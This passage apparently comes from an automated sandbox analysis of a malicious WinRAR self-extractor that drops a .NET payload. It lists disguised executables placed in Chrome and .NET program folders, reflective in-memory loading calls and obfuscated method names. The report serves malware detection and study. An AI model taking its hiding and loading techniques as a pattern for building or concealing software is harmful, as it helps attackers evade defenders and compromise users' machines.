            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
            Source: C:\chainSurrogate\browsersvc.exe Directory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe
            Source: C:\chainSurrogate\browsersvc.exe Directory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\1b42ae2595212a
            Source: C:\chainSurrogate\browsersvc.exe Directory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe
            Source: C:\chainSurrogate\browsersvc.exe Directory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\5940a34987c991
            Source: DFpUKTL6kg.exe Static file information: File size 1164929 > 1048576
            Source: DFpUKTL6kg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: DFpUKTL6kg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: DFpUKTL6kg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: DFpUKTL6kg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: DFpUKTL6kg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: DFpUKTL6kg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: DFpUKTL6kg.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: DFpUKTL6kg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: DFpUKTL6kg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: DFpUKTL6kg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: DFpUKTL6kg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: DFpUKTL6kg.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, dMHUKffUPGQiwfC8LCj.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, dMHUKffUPGQiwfC8LCj.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, GJX08jxFEBcbTsRKlEy.cs .Net Code: mHlOFOdMrv System.AppDomain.Load(byte[])
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, GJX08jxFEBcbTsRKlEy.cs .Net Code: mHlOFOdMrv System.Reflection.Assembly.Load(byte[])
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, GJX08jxFEBcbTsRKlEy.cs .Net Code: mHlOFOdMrv
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, GJX08jxFEBcbTsRKlEy.cs .Net Code: mHlOFOdMrv System.AppDomain.Load(byte[])
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, GJX08jxFEBcbTsRKlEy.cs .Net Code: mHlOFOdMrv System.Reflection.Assembly.Load(byte[])
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, GJX08jxFEBcbTsRKlEy.cs .Net Code: mHlOFOdMrv
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe File created: C:\chainSurrogate\__tmp_rar_sfx_access_check_3769812
            Source: DFpUKTL6kg.exe Static PE information: section name: .didat
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe Code function: 0_2_00A0E28C push eax; ret 0_2_00A0E2AA
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exe Code function: 0_2_00A0ED46 push ecx; ret 0_2_00A0ED59
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Code function: 35_2_00007FFD9BAC2F15 pushfd ; iretd 35_2_00007FFD9BAC2FE2
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe Code function: 35_2_00007FFD9BAD0B03 push E95D46FFh; ret 35_2_00007FFD9BAD0B19
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, kbELY8Z6rbtYcIBHYdx.cs High entropy of concatenated method names: '_269', '_5E7', 'DEdoHrbvcU', 'Mz8', 'N5RoJ1wNrC', 'inFV4a5rxA9myp3fdX4', 'i6eaqk57sIaHgfu2ybF', 'KtxBaU5L369kPXFhRIm', 'RhyaDN5wrANZxe5ZlZ1', 'lsp3Wp5q7BoxyfbKXnA'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, AYeAY2DGAuY046KAvUS.cs High entropy of concatenated method names: 'wikj558U6d', 'hXN0S84YDPTD1p1D8O2', 'zeRQyJ4w7bvEoXpFC2W', 'GLDqGg4qScZgf8cTnqB', 'vMuXw84tWm0Y82FDP3Q', 'fFS9i34S7PCBgfPQuaA', 'N0vVpN4zvojiY7uiitH'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, PSbbAuZ3lZjvnlgyjEW.cs High entropy of concatenated method names: 'mEhaZhAM5J', 'X07a9nUVIc', 'cM5aVY6fiP', 'XvWa0Pk6rC', 'eZe0JCG2buH7BCQmYfu', 'XdaWcDGCgmPAUDc9HQi', 'vMDUF9GOlDdOcPm25Ea', 'BfRKryGiIpKVdKDSkRk', 'MpeyWMGBjKgEdaP9rI3', 'VC6akFG4Q7Z01vr2Zu5'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, en3bUidfCSXmE05EjLw.cs High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'xy5lW5cw3BV0wHU2FeJ', 'pvgk02cqOBPCEWIPufu', 'kPgM8NcY8NZcvypUQur', 'JhYiIFctF0kf02tn9aT', 'eSIioxcSpATHSZwV2sR', 'JVs0hrczDp8kCqBC8MR'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, ApP5TTzE2emjICUHTs.cs High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'beIF1McbpeoL34r3ckm', 'I9ejBQcDmmd9x9qI7yL', 'nDfhqlcxjvqUEwqZrUp', 'VvOZcRccO5mBFbMCiDL', 'kW2RNYcVm7ldhpDglgI', 'bNuo98cQvy2JaTxNpFG'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, TL926Ex3rQ57xjWu38H.cs High entropy of concatenated method names: 'f8wOWgjqdc', 'zlZZPFKbSbBUHWsRhRE', 'KlEbh7KDN4NJW7kDkYa', 'shblDNKPQ01AHM2WBHB', 'NGIPvJKETCDRGIwjidH', 'jVx3sXKxjdA1PdH9QPR', 'jxtMaWKct8tRtRQnEWM', 'f5q1EtKVtZ5fbiflsIo', 'qPXaYJKQjc8GSnI2Zo4', 'u2BsxkKXsc2uObWfbDf'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, VwKuOwZO4QdsBRp2XKM.cs High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'wFJp1t7oZG', 'zRMoPxgPdq', 'FZDpK6CxMV', 'gi1oNHbJAd', 'kG7bAb566SorBY4himj', 'I2DFj55oLP0XrKXMaim', 'gihF3d5OvuCH7PLAGvu'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, EEPp77xo7ILi3d5Snj2.cs High entropy of concatenated method names: 'Vb5Oz8Vq6n', 'PoKR5HIdXA', 'FIbRbPwZlm', 'xu0RmeLdyh', 'yIVROrNhEn', 'FeWRRiLjnX', 'kHnRHoUHRA', 'FfmRla5Rf8', 'OB9R41GOog', 'T0nRaslgoM'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, HK2g72X5JB6Aithn45p.cs High entropy of concatenated method names: 'kdY2UwoBoi', '_1kO', '_9v4', '_294', 'lmO2q0yRsN', 'euj', 'Mev2kxdMDY', 'E3e2jiJ3uF', 'o87', 'ty928bd20L'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, QIp5ggsoemj4C6RCGW4.cs High entropy of concatenated method names: '_7zt', 'zJWAfMIKPd', 'i9AAIfKcRf', 'ABbAEpBB6X', 'qrBAcEaTkY', 'JmcAUHFt2m', 'TAUAqbKbbO', 'Of94kTynoDdSKZ6muXE', 'y09PfCy5DhFZq1Md8RM', 'lAQs8dyGbdR9Vnkq59v'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, fAFL9dmJcW03lmQF6M.cs High entropy of concatenated method names: 'Qh7vwShTn', 'CDar013Iw', 'g7WtSRZLh', 'qVwOLFP626KE3x1Tl4N', 'N5oFgAPOi4AeWX7Kr5q', 'LUw34LP4ClXsUy55iVd', 'eVPBubPoAqFJySLuItE', 'mWagFFPINTmLRYBS4H7', 'aZMM6XPHvU1Cld8gg4R', 'hTLWkgPjouVP2XR2oV3'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, IA85i92kH4a3IoGErw.cs High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'CvFGteEgdcfp4OSbmRd', 'Egt73SEvMxUGt7dfn36', 'AjrdmtE30f1erpuJIqy', 'fniNTPEFPWUdGrjOwFX', 'zVFVivEKvuNKPfpvCvy', 'Rg2JHuE92YJHPV1YLBV'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, xl9TQQDKRpUJYjs70fW.cs High entropy of concatenated method names: 'MsAkymYrAp', 'm5WkYkqerE', 'SEPkXH5L5D', 'WTjriw4IcwVrqVp2Juu', 'urVAir46sCo6toiml7g', 'uH3nXO4oU6L9gThbX0f', 'HbOchL4HStIgSXykIBk', 'o0qWnI4jeP9dmQtvxf0', 'IFmd2H4A5SpmHTevJeu', 'aekgRW4ReR32NAoHqiP'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, GJX08jxFEBcbTsRKlEy.cs High entropy of concatenated method names: 'KXlODhMyTx', 'tPROucks12', 'QbXOvrlmwu', 'VLIOrIqdXJ', 'tcEOtuE0vH', 'VP3OPJ2Y4f', 'LKROwokqx1', 'OCgsFWFJahHq5D7BxjW', 'grgG8fFn0B75G9ZVnWn', 'TWP1L9F5N6ZLG4PCo38'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, pAkbYfZEpr9GVrHfYhW.cs High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'BG5bxFnFO4MqlAtOZ3P', 'dSpHAonKh0RTSJu8QeX', 'gVjaJXn9MsAWAZCUOLi', 'CWShCynu477EA5x1ZmH'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, r9TS3xXxM2MYeFLfO7b.cs High entropy of concatenated method names: 'gxE8aZhFSM', 'X1B8nQg7WO', '_8r1', 'py48pZSWxT', 'bnk81vw0Ro', 'ap58K8AK1P', 'NGT8AJhgG4', 'aKrXvNIuaPYsj3kg3kc', 'gZuM7aId8eJwFaIRgFP', 'iBY7gAIkpZwZlQ1jR3l'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, nEcnebTtSOPY5AtEUj.cs High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'U0l8mUxLl0p4dcSPJXF', 'tiu2Mfxw93TrmI820j7', 'rYALg7xqOecF8BBYq7Z', 'Q4gXbcxYxBH8bJUPvY5', 'ACfCKixt1kqADUlLCCL', 'Lc7Q7yxSqxWbXU6BKFp'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, AsxmUNxgB7Y4tOFsGpI.cs High entropy of concatenated method names: 'qEG4j4fB6O', 'xXUC0HhUXXrwcYCf2hI', 'QloDCAh0DtjAnJaDQgL', 'IwtygwhsSP41UQ2D3hI', 'VHRk8PhrbZRjjscr4PD', 'MsCgssh7lkekhJ2NDyf', 'dIk4QZmmZh', 'pPL4fdFXd6', 'c7f4IUBNfZ', 'zRC4EID06P'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, rp3UVCO8iBTAaELsHU.cs High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'LZORAQx9BC1Vo91AvPF', 'yQRA2bxurSffereCI1W', 'HVdu9Qxdck3jO87SLX8', 'XqFE5ZxkwBQHvR6sLYa', 'WwL4jXxhuWRN0vEMbrY', 'FthKpqxlD6nfM7L9smO'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, LKInObZ45OPM05GRMhI.cs High entropy of concatenated method names: 'sg9', 'MnKoDSmR0c', 'KXNnSMoM21', 'ufvoX3xkD3', 'R6JVVvn0NHAy4fXAmpS', 'cAOu7GnsUxhf9664qHv', 'xtgpRHnUybcoS8po2wc', 'dkFGJeneP77M8kPx9Wp', 'hTh3F0nM4WN9yKnvHsI', 'GYD43Onra4teFUZmIBK'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, Y2CWIGxQCH7dOHmCRrc.cs High entropy of concatenated method names: 'xjuRSVBuNV', 'Sd0RiEaKOA', 'wQ2RzxRb3X', 'VqbH5gG9Jh', 'PflHbQI6TZ', 'aimHmQAMf2', 'C9nHOGrKqj', 'YE0HRSlCeO', 'QrTHHdKdex', 'LpR5nUuwTiuZSjsPQ6p'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, gtXKCTsT4XBSbnH76Yb.cs High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, TQ4W7aZ7XDjyl0M0vkc.cs High entropy of concatenated method names: 'VlgaYdn3QG', 'PALaX2vVbP', 'tLuaBbtdNV', 'kSLR1wGeRU9vnAp4Vm8', 'bpseb8GMmdfaANKu4pV', 's518ZXG0WiBcpej8q2O', 'X6UKWvGsvyN5wdu6rMV', 'rnVpYTGUeqHvGUGnnr8', 'WwAGk4GrU5TWQhIFMBM', 'jOr17lG730oFfIYHlbu'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, KhKi4ndZV4QU2HwLavn.cs High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'Qf5oBkcfUaxPUg66goo', 'V74uHmcNQdm0ZrmmDHs', 'ig3bvBciEGx3hTbREd0', 'W8uiM5cBMDBGra5yLdI', 'Kbh25Gc2SqDkdA575vx', 'k7NQVycCp6spI5HaeSF'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, uWT2crfteTXBrHq8GA.cs High entropy of concatenated method names: 'sjneCclAh', 'ipqIwHBlsEaYTeQFBx', 'WMjFtnNIZp7gwl7O2x', 'LE6taYijSu0YQ0CoBG', 'w8lKIX2BujlITwOk2Z', 'eofFPhCboouhqVX5Ao', 'wVxmlvFek', 'qxPOPNC3t', 'db5R8Qcub', 'MijHJkoAj'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, YsA24Yd7geLmlYEVkXw.cs High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'lcousKV7wb52aQMIp46', 'uMZ36rVLaHxaKLwa2Cj', 'f3t38nVwjWLO4EUg8Ro', 'IEL2aIVqaHeMdiRTwnl', 'xqcB8HVYCxXyfgVcsTx', 'nNqrQjVtAKMh6jt17HI'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, D5Uplpxx5W1fOQNCr6S.cs High entropy of concatenated method names: 'mSomy6pIBZ', 'B9ZmYacfor', 'BrTmXVEOd9', 'CZqmBF9gSx', 'zq0mTQMjQb', 'g10msCwOym', 'hkKRG53kFwedoshnU6u', 'W020qu3hNALOLYONqeU', 'G1uEjP3uj3J0M1eccoI', 'pn1IRk3dUxS6U7GNv9T'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, pZfICPDgYUq3NSZjAi6.cs High entropy of concatenated method names: 'O4RjgjHrRn', 'hgCjdu0GWO', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'LUtj2woq70', '_5f9', 'A6Y'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, EFgwVldQTGZNCZXMDoo.cs High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'zqlsDiXOCIxB0GUC0PX', 'IC8gU8X4LCY41mg69aP', 'VLsXLbX60TUatrVZMgV', 'Wx0N9aXoqV594UgFK5O', 'I2bSGeXIGD1Eh5D9BRR', 'elDQXmXHtswxHx3aHty'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, Q1lxF4Z8vQSU9cfTIJV.cs High entropy of concatenated method names: '_223', 'VW2C3tGkga9KtAJpvF2', 'iSBDTbGhaYwJCen8d3v', 'uolQJHGl9WN4iGCK0Pj', 'uHktImG1Lk2324FgZ41', 'E0FWJEGG6AJY3b9Mq3E', 'GKgvwtGps9hFgVaHEC9', 'PjRoJfGnBAnHcH4wMcs', 'JMVRYxG5TJ7LXfv4cSh', 'HOClu8GJPFsVIDvHiF1'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, h166EPdApj73RvAYgAv.cs High entropy of concatenated method names: 'zHSmfF0XoN', 'G7JZghvcJ8oy0poS2sj', 'vDbcagvVpDBS0mWtfJU', 'LPFl77vD6AOwEp1NkQs', 'er8GmLvxPs0ubsGv46Y', 'vbBDDsvQim8DUIEA9ae', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, vDKNB96O3ag3p63IqL.cs High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'hliLggxT0mK5h46AOBs', 'bOHbS6xZ6AEgFVkEV9u', 'zlZbhOxfEWNgM16u2mu', 'gbKU7JxNCQm4aWj51O6', 'lOObM3xihYfkVIyN2LG', 'royuE2xBYMlN5jto9oW'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, Ri5qQaREX32lTyw2eG.cs High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'QKFT7lbOoWfHbRNNolv', 'Oss7bdb4L1r5flLsaXH', 'dlVj4Fb64xg0A5dBqvm', 'VLFA5ebotMmNq00S4Jw', 'Rkrqo2bIVv5gJ1wJoeZ', 'MlRLGqbHnb1ZaZw4T7W'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, NPiEhtypcJsgmsh3y5.cs High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'Bh6bOixciVAIOFnew3L', 'Pa9vDUxVLmkStkDe8v7', 'B3NTygxQQDcBJMakyIV', 'w47OswxXrGZQkP6v0p4', 'uH8Jfrx8Fsr8ddeL9rK', 'aoRjLpxgZbEdPcLF7lp'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, m8xxgBsArJkA9kgb2ob.cs High entropy of concatenated method names: 'mrdojISvdI', 'gGio7n5G9q', 'NWyoePSoIf', 'lTVoFASKeu', 'iDFooNeOoL', 'jhUoN1iW2Q', 'Mq1o6yF5vD', 'q6hoGGFahE', 'g0KoQuf7rr', 'uxsofF98hg'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, toZDe4ddOXTXU6sWT30.cs High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'dbdLKOclqfhi4d3OPph', 'PKyDWIc16BrmlxWnfrq', 'EYrvLTcGZSWAi47P2S0', 'QZPjgpcpjBQWwslQHrq', 'hBKgB1cnRql0dpXyQ3S', 'JQCPZZc56pmiNSUxJAy'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, WtvWuUsFZM7ZkGQMaaW.cs High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, sY38QOXHeYrDnHKPQPW.cs High entropy of concatenated method names: 'PJ1', 'jo3', 'xjd2np1iiN', 'cTA2p4kwRK', 'OSj21wmfOv', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, LyKhV9Zzu17Tu60Uy0a.cs High entropy of concatenated method names: 'O2Ypg4TpZ5', 'QStpdNTGad', 'uHgp2XHj0w', 'iWfJQgJHWjnSRO2GrMN', 'uJoRZ7JjeikbSBse4Cl', 'iAgZojJo7LhHZ5GKFur', 'aYMQKGJIYSCWeqwpAPH', 'STrsVHJAK6kCq1pt0FW', 'mQJKIsJRppHnoVEWWaP', 'FcGH7vJeVAif0K7Wuji'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, lJsZfEdvrSPNC5yCBaG.cs High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'orw3PbQSy7LpuyH6LrL', 'k9LOhaQzQdAkiC6tUdC', 'G3sTckXWmCJTVJFxigR', 'bInmtPXPOA0NnwAQr3v', 'tHx6O7XEEstYrX5vrQL', 'PQjbaJXbypgrEJQCQ7h'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, DSa7C9fSZlrcVpfbDvT.cs High entropy of concatenated method names: 'SJXymQBBclshP', 't8qtqQe98u49uOXuy7S', 'FrJO2Geu5b07QHRG4jl', 'yxlwTLedHUKiyAwdrP1', 'kbmDltekpLefdk6QGyP', 'mw16v7ehynkvYAaKEw1', 'ylJRP5eFgXMWF9A3GBL', 'oVN1gveKc0mm4sGbucs', 'dG8bNbelFZVcyx7TMR6', 'svj9Xye1whPpYe4SaSb'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, Yx9MwxdFjkek32oq816.cs High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'BTscnxVVU06mNq8c0WF', 'Ijani7VQVdfq46CRSNn', 'fG4530VXRdqBqj3vgao', 'dmoXSYV8XQ0Z58eEHXK', 'Rle65DVgnnUN7EOqtbe', 'VDh9bYVv65aTk4Pl5gd'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, qLUmKCXQQmYrnTFKosa.cs High entropy of concatenated method names: 'F9U7nBMqPt', 'KIl7p3GOJY', 'ncZ71sOMWS', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'ndm7KfQurU'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, PMGioSd3djNpJjdnymI.cs High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'UnF1NNVo1BIl2Lc747a', 'VbSsQKVIKDs0wXY4DfA', 'i3qQEPVHGvx86j2vJ6j', 'Hl5ynhVjBqtD0AGSRjy', 'mHsS3AVAdk6EDowIu5i', 'TVlnBCVR9rpGGos06Zx'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, r1udVSDBUOEUxUlSBNQ.cs High entropy of concatenated method names: 'tPxjRfx6dU', 'LE2jHIp6j6', 'aOvjlfNIF9', 'RGfj4TrSj3', 'wWdjaefVyx', 'lZhjnrETcC', 'H58jp11s15', 'Olhj1hqI13', 'AqJjKQ93t9', 'uU4jApKAeX'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, DIF91NYDdmokIWoLsD.cs High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'vlSSlgEtTOq6rgcj7EL', 'GZZnF7ESB3JZyZ3HcIp', 'wkRgo8Ez3vqj6RgkfCg', 'FBYxqpbW5roReDh20DV', 'PwXyuubPb5exQs1Fljq', 'b2r2W5bE9msAAQIopq8'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, nmTk31ZnUBArjI53DIF.cs High entropy of concatenated method names: 'MQqaT5owk6', 'MqUasFI9T1', 'LHCaJ69NJc', 'oxwaWoyd33', 'Ic8axBF0YE', 'NTVxA6pcRlekCp5AVx2', 'EqELYApVImcluJuZL0v', 'hbCf0qpD6VQXWvZ4Cg8', 'jXBn4Kpx1yTvIoXwdOI', 'fM6uKRpQ8bnmPyafcYw'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, thAGm8dEJJURfmdbUGU.cs High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'yrRXw5QJ1dqHm8Co9jY', 'w2LUBmQmahAl8hLwtpP', 'wtjl6AQyNlnfwkvN923', 'qv5a8YQaOc21aGZdlwr', 'iioICJQTV7WaBkoMYqZ', 'iTk2bfQZ7KpbAhXC1b7'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, EJiJwsxiD605P1XZuxS.cs High entropy of concatenated method names: 'BimOSjghPI', 'BUuOiQjyxu', 'rYwNBKKlGfFmpm2IY3x', 'eyYBxRK1eCHfb2YpBKh', 'MltfWOKGdPlhHQhO03M', 'PWr7aKKp2FtuKjB306t', 'aVYL4XKnJiYt4oWhJe6', 'fGohNNK5eCyKjniQ1bX', 'aIrL1fKJOB6tkpR7lYC', 'b1HCSeKmWjwEkDqxTEg'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, JaMKf6sDnndN661ytUn.cs High entropy of concatenated method names: 'GoqK6kI3b6', 'OENljVmhwkP020gEU4r', 'VP5H6dml1qDqCYuvfHj', 'lGNQ1ZmdxTU2NLQiV3w', 'rERVDImkR8Ebt7KtXB9', 'bDJpC3yo1Z', 'G7rpMTdcF0', 'v5IpDQLDcn', 'EmQpuh8BEU', 'aqjpv4B4ww'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, Qrs6xQXEOF7CDurSLyY.cs High entropy of concatenated method names: 'pjQ8ItCMq9', 'H4y8E5c1h9', 'OeB8cM5VpY', 'ap58UC1xDN', 'xAm8qsfj4g', 'WtBv5dIYqZ10RL4OV3a', 'KKwuZNItnmNPRMG3UNd', 'XBA2e7ISc9oiFDCfFCA', 'dviHY5Izw1gxHLcJxSe', 'L3Ko5EHWynSk7KMTe4j'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, bfu6C6X9JmnkS716g86.cs High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'cVJ7jFDv1G', 'K1M786xHAS', 'mtZ77ND7M8', 'Xso7g3iOiZ', 'Rkc7dv7tx2', 'e0G72wDCCA', 'jFKBm7j41KOrNyaYMo0'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, acvMHVZVlLFT3hCKiXu.cs High entropy of concatenated method names: 'hTlnoAsP0D', 'u7cnNtshgi', 'hb2n6T0fdC', 'x0peMIpAPWldaTtAGtf', 'Ex4AsdpHl5DQBW5jJEv', 'WTasEOpjKUgtt0bhiVr', 'vpTulFpRYH2Js3GYAc8', 'wg1nlYajBH', 'Vhfn47TP1k', 'jjOnaZKI0R'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, j5tqrJskQK5kCx9sFvO.cs High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'pGVe5lxTbg', '_3il', 'NqPebeetm5', 'SMEemnZsMs', '_78N', 'z3K'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, CK1e8E9tAoqjjtLJGF.cs High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'EZi3iTt0Z', 'AwOLkhEl3V6BhTYaLTu', 'Y3AjHRE1UEajgXhgZ9f', 'KNvbSuEGQxQbB4IJBeX', 'bTPndxEps1BqKBjSOpp', 'b3gN2MEnUpkF9CmKmmE'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, tVjLZyZAyStVKejHOXY.cs High entropy of concatenated method names: 'iB1H8GJ4vDtPtyDm7q2', 'lPiFwEJ6vq1YMOwKOQE', 'rnQiu2JCiKAwRycr3iJ', 'QQO3ElJO5KJQIj7qHAA', 'IWF', 'j72', 'TJgp6tCthp', 'yx5pGLsKkW', 'j4z', 'RAbpQlg6hZ'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, jRgJItsSH6hwUs35diH.cs High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, yRCngOdOfYSwuMtoQJy.cs High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'CxAeNtgiQ0FZdbXB1Cx', 'TBeLt0gBfmGf26F2aDl', 'Poihhog2vKfVso9faqf', 'rfZgsXgCa4plmP4M5ps', 'PfUThKgOqODnW44g9EC', 'mte5XBg4rYIGcykw8dX'
